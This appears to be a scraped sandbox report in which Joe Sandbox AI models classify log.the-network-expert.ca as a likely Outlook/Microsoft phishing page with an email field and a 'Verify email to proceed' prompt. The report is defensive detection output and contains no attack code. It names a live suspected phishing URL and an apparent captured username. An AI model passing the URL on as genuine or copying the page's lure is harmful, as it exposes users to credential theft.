| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | ```json{ "legit_domain": "outlook.com", "classification": "wellknown", "reasons": [ "The brand 'Outlook' is well-known and is associated with Microsoft.", "The legitimate domain for Outlook is 'outlook.com'.", "The provided URL 'log.the-network-expert.ca' does not match the legitimate domain for Outlook.", "The URL contains hyphens and an unusual domain structure, which is often indicative of phishing.", "The domain 'the-network-expert.ca' does not have any known association with Outlook or Microsoft.", "The presence of an input field for 'Email Address' is common in phishing attempts to capture user credentials." ], "riskscore": 9}
Google indexed: False |
URL: log.the-network-expert.ca
Brands: Outlook
Input Fields: Email Address |
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | ```json{ "legit_domain": "outlook.com", "classification": "wellknown", "reasons": [ "The brand 'Outlook' is well-known and is associated with Microsoft.", "The legitimate domain for Outlook is 'outlook.com'.", "The provided URL 'log.the-network-expert.ca' does not match the legitimate domain for Outlook.", "The URL contains hyphens and an unusual domain structure, which is often indicative of phishing.", "The domain 'the-network-expert.ca' does not have any known association with Outlook or Microsoft." ], "riskscore": 9}
Google indexed: False |
URL: log.the-network-expert.ca
Brands: Outlook
Input Fields: unknown |
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'log.the-network-expert.ca' does not match the legitimate domain for Microsoft.", "The domain 'the-network-expert.ca' does not have any known association with Microsoft.", "The use of a subdomain 'log' and the structure of the URL suggest it could be a phishing attempt.", "The URL contains hyphens and an unusual domain structure, which are common in phishing URLs." ], "riskscore": 8}
Google indexed: False |
URL: log.the-network-expert.ca
Brands: Microsoft
Input Fields: unknown |
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify email to proceed",
"prominent_button_name": "Next",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | {
"brands": [
"Outlook"
]
} |
|
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify email to proceed",
"prominent_button_name": "Next",
"text_input_field_labels": [
"alain_benoit"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | {
"brands": [
"Outlook"
]
} |
|
| URL: https://the-network-expert.ca Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://the-network-expert.ca |
Edit tour
chrome.exe (PID: 7128 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node